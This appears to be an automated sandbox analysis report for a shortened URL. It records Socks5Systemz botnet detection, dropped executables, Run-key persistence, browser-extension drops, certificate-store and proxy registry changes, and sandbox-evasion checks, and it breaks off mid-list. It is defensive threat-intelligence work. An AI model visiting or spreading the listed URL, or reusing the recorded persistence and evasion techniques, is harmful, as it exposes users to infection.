Overview
overview
10Static
static
1URLScan
urlscan
1https://ify.ac/1IZk
windows11-21h2-x64
10https://ify.ac/1IZk
windows10-1703-x64
8https://ify.ac/1IZk
windows10-2004-x64
10https://ify.ac/1IZk
windows11-21h2-x64
10https://ify.ac/1IZk
android-10-x64
1https://ify.ac/1IZk
android-11-x64
1https://ify.ac/1IZk
ubuntu-18.04-amd64
3https://ify.ac/1IZk
ubuntu-20.04-amd64
4https://ify.ac/1IZk
ubuntu-22.04-amd64
3https://ify.ac/1IZk
ubuntu-24.04-amd64
4Analysis
-
max time kernel
450s -
max time network
441s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
16-07-2024 05:11
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ify.ac/1IZk
Resource
win11-20240709-en
Behavioral task
behavioral2
Sample
https://ify.ac/1IZk
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
https://ify.ac/1IZk
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
https://ify.ac/1IZk
Resource
win11-20240709-en
Behavioral task
behavioral5
Sample
https://ify.ac/1IZk
Resource
android-x64-20240624-en
Behavioral task
behavioral6
Sample
https://ify.ac/1IZk
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral7
Sample
https://ify.ac/1IZk
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral8
Sample
https://ify.ac/1IZk
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral9
Sample
https://ify.ac/1IZk
Resource
ubuntu2204-amd64-20240522.1-en
Behavioral task
behavioral10
Sample
https://ify.ac/1IZk
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
https://ify.ac/1IZk
Malware Config
Signatures
-
Detect Socks5Systemz Payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4784-865-0x0000000000AE0000-0x0000000000B82000-memory.dmp family_socks5systemz -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 218 4576 rundll32.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpid process 4400 powershell.exe 2860 powershell.exe 3660 powershell.exe 5128 powershell.exe 3424 powershell.exe 6024 powershell.exe 5436 powershell.EXE -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rundll32.exeLsO2143M1d0.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LsO2143M1d0.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Snetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeLsO2143M1d0.exeHhkZqKf.exeSnetchball.exeSnetchball.exeSnetchball.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation LsO2143M1d0.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation HhkZqKf.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation Snetchball.exe -
Executes dropped EXE 48 IoCs
Processes:
setup_CU3cRmqhm4.tmpdjminoradequate.exeRP3U09NqkneL.exelNdzzyFPAwOlp5XgSLE.exelNdzzyFPAwOlp5XgSLE.tmpfreevideoplayer.exefreevideoplayer.exelOyDlKbc.exesetup.exesetup.exesetup.exesetup.exesetup.exeLsO2143M1d0.exeAssistant_111.0.5168.25_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeLsO2143M1d0.exeHhkZqKf.exesetup.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exepid process 1408 setup_CU3cRmqhm4.tmp 1112 djminoradequate.exe 1244 RP3U09NqkneL.exe 764 lNdzzyFPAwOlp5XgSLE.exe 760 lNdzzyFPAwOlp5XgSLE.tmp 1092 freevideoplayer.exe 4784 freevideoplayer.exe 4708 lOyDlKbc.exe 2932 setup.exe 1828 setup.exe 780 setup.exe 3488 setup.exe 2296 setup.exe 5416 LsO2143M1d0.exe 2736 Assistant_111.0.5168.25_Setup.exe_sfx.exe 5464 assistant_installer.exe 5500 assistant_installer.exe 5936 LsO2143M1d0.exe 5632 HhkZqKf.exe 1216 setup.exe 2052 Snetchball.exe 3860 Snetchball.exe 208 Snetchball.exe 620 Snetchball.exe 3776 Snetchball.exe 3532 Snetchball.exe 5024 Snetchball.exe 4852 Snetchball.exe 552 Snetchball.exe 4300 Snetchball.exe 5468 Snetchball.exe 4344 Snetchball.exe 4920 Snetchball.exe 5964 Snetchball.exe 1424 Snetchball.exe 5240 Snetchball.exe 3152 Snetchball.exe 5124 Snetchball.exe 4504 Snetchball.exe 1216 Snetchball.exe 3792 Snetchball.exe 1752 Snetchball.exe 4820 Snetchball.exe 5200 Snetchball.exe 4432 Snetchball.exe 4980 Snetchball.exe 5696 Snetchball.exe 4928 Snetchball.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_CU3cRmqhm4.tmpRP3U09NqkneL.exelNdzzyFPAwOlp5XgSLE.tmpsetup.exesetup.exesetup.exesetup.exesetup.exeassistant_installer.exeassistant_installer.exerundll32.exesetup.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exepid process 1408 setup_CU3cRmqhm4.tmp 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 1244 RP3U09NqkneL.exe 760 lNdzzyFPAwOlp5XgSLE.tmp 2932 setup.exe 1828 setup.exe 780 setup.exe 3488 setup.exe 2296 setup.exe 5464 assistant_installer.exe 5464 assistant_installer.exe 5500 assistant_installer.exe 5500 assistant_installer.exe 4576 rundll32.exe 1216 setup.exe 2052 Snetchball.exe 2052 Snetchball.exe 2052 Snetchball.exe 2052 Snetchball.exe 2052 Snetchball.exe 2052 Snetchball.exe 2052 Snetchball.exe 2052 Snetchball.exe 3860 Snetchball.exe 3860 Snetchball.exe 208 Snetchball.exe 208 Snetchball.exe 620 Snetchball.exe 620 Snetchball.exe 3776 Snetchball.exe 3776 Snetchball.exe 3860 Snetchball.exe 3860 Snetchball.exe 208 Snetchball.exe 208 Snetchball.exe 620 Snetchball.exe 620 Snetchball.exe 3776 Snetchball.exe 3776 Snetchball.exe 3532 Snetchball.exe 3532 Snetchball.exe 3532 Snetchball.exe 3532 Snetchball.exe 208 Snetchball.exe 208 Snetchball.exe 620 Snetchball.exe 3860 Snetchball.exe 620 Snetchball.exe 3860 Snetchball.exe 3860 Snetchball.exe 3860 Snetchball.exe 3860 Snetchball.exe 3776 Snetchball.exe 3776 Snetchball.exe 3860 Snetchball.exe 3776 Snetchball.exe 3776 Snetchball.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 91.211.247.248 -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
HhkZqKf.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json HhkZqKf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json HhkZqKf.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
HhkZqKf.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini HhkZqKf.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
setup.exesetup.exedescription ioc process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Drops file in System32 directory 30 IoCs
Processes:
HhkZqKf.exepowershell.exepowershell.exeLsO2143M1d0.exeSnetchball.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 HhkZqKf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 HhkZqKf.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol LsO2143M1d0.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 HhkZqKf.exe File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF Snetchball.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content HhkZqKf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 HhkZqKf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini LsO2143M1d0.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 HhkZqKf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 HhkZqKf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA HhkZqKf.exe -
Drops file in Program Files directory 14 IoCs
Processes:
HhkZqKf.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi HhkZqKf.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\oypPEctclvbNW.dll HhkZqKf.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\jgEFQAg.xml HhkZqKf.exe File created C:\Program Files (x86)\UQtSSXvqU\yPccvN.dll HhkZqKf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi HhkZqKf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak HhkZqKf.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\DUmEHlW.dll HhkZqKf.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\KQkDXwm.dll HhkZqKf.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\IzTFYtH.xml HhkZqKf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak HhkZqKf.exe File created C:\Program Files (x86)\UQtSSXvqU\zdIGiNQ.xml HhkZqKf.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\GnpHogS.xml HhkZqKf.exe File created C:\Program Files (x86)\ezMWJXFFLyUn\hQEJhwo.dll HhkZqKf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja HhkZqKf.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job schtasks.exe File created C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job schtasks.exe File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job schtasks.exe File created C:\Windows\Tasks\MRTHivZIQsRdEanwm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1784 1112 WerFault.exe djminoradequate.exe 1392 1112 WerFault.exe djminoradequate.exe 2632 1112 WerFault.exe djminoradequate.exe 540 1112 WerFault.exe djminoradequate.exe 1940 1112 WerFault.exe djminoradequate.exe 4836 1112 WerFault.exe djminoradequate.exe 180 1112 WerFault.exe djminoradequate.exe 1176 1112 WerFault.exe djminoradequate.exe 2792 1112 WerFault.exe djminoradequate.exe 2864 1112 WerFault.exe djminoradequate.exe 768 1112 WerFault.exe djminoradequate.exe 4356 1112 WerFault.exe djminoradequate.exe 2300 1112 WerFault.exe djminoradequate.exe 3812 1112 WerFault.exe djminoradequate.exe 3204 1112 WerFault.exe djminoradequate.exe 4804 1112 WerFault.exe djminoradequate.exe 224 1112 WerFault.exe djminoradequate.exe 180 1112 WerFault.exe djminoradequate.exe 2008 1112 WerFault.exe djminoradequate.exe 3088 1112 WerFault.exe djminoradequate.exe 2980 1112 WerFault.exe djminoradequate.exe 228 1112 WerFault.exe djminoradequate.exe 968 1112 WerFault.exe djminoradequate.exe 3504 1112 WerFault.exe djminoradequate.exe 2916 1112 WerFault.exe djminoradequate.exe 3576 1112 WerFault.exe djminoradequate.exe 3712 1112 WerFault.exe djminoradequate.exe 2064 1112 WerFault.exe djminoradequate.exe 4400 1112 WerFault.exe djminoradequate.exe 2272 1112 WerFault.exe djminoradequate.exe 2736 1112 WerFault.exe djminoradequate.exe 3288 1112 WerFault.exe djminoradequate.exe 780 1112 WerFault.exe djminoradequate.exe 3536 1112 WerFault.exe djminoradequate.exe 4204 1112 WerFault.exe djminoradequate.exe 2880 1112 WerFault.exe djminoradequate.exe 764 1112 WerFault.exe djminoradequate.exe 3676 1112 WerFault.exe djminoradequate.exe 2812 1112 WerFault.exe djminoradequate.exe 2736 1112 WerFault.exe djminoradequate.exe 1180 1112 WerFault.exe djminoradequate.exe 1204 1112 WerFault.exe djminoradequate.exe 1040 1112 WerFault.exe djminoradequate.exe 4772 1112 WerFault.exe djminoradequate.exe 5360 1112 WerFault.exe djminoradequate.exe 5468 1112 WerFault.exe djminoradequate.exe 5516 1112 WerFault.exe djminoradequate.exe 5560 1112 WerFault.exe djminoradequate.exe 5604 1112 WerFault.exe djminoradequate.exe 5648 1112 WerFault.exe djminoradequate.exe 5800 1112 WerFault.exe djminoradequate.exe 5888 1112 WerFault.exe djminoradequate.exe 5992 1112 WerFault.exe djminoradequate.exe 5276 1112 WerFault.exe djminoradequate.exe 5356 1112 WerFault.exe djminoradequate.exe 5568 1112 WerFault.exe djminoradequate.exe 5764 1112 WerFault.exe djminoradequate.exe 1740 5936 WerFault.exe LsO2143M1d0.exe 3964 1112 WerFault.exe djminoradequate.exe 2008 1112 WerFault.exe djminoradequate.exe 6124 1112 WerFault.exe djminoradequate.exe 1492 5416 WerFault.exe LsO2143M1d0.exe 5300 5632 WerFault.exe HhkZqKf.exe 5564 1112 WerFault.exe djminoradequate.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe nsis_installer_2 -
Enumerates system info in registry 2 TTPs 10 IoCs
Processes:
msedge.exemsedge.exerundll32.exeLsO2143M1d0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS LsO2143M1d0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName LsO2143M1d0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies Control Panel 3 IoCs
Processes:
Snetchball.exeSnetchball.exeSnetchball.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeHhkZqKf.exepowershell.exepowershell.exerundll32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1d5b4de3-0000-0000-0000-d01200000000}\MaxCapacity = "14116" HhkZqKf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" HhkZqKf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1d5b4de3-0000-0000-0000-d01200000000}\NukeOnDelete = "0" HhkZqKf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" HhkZqKf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing HhkZqKf.exe Key created 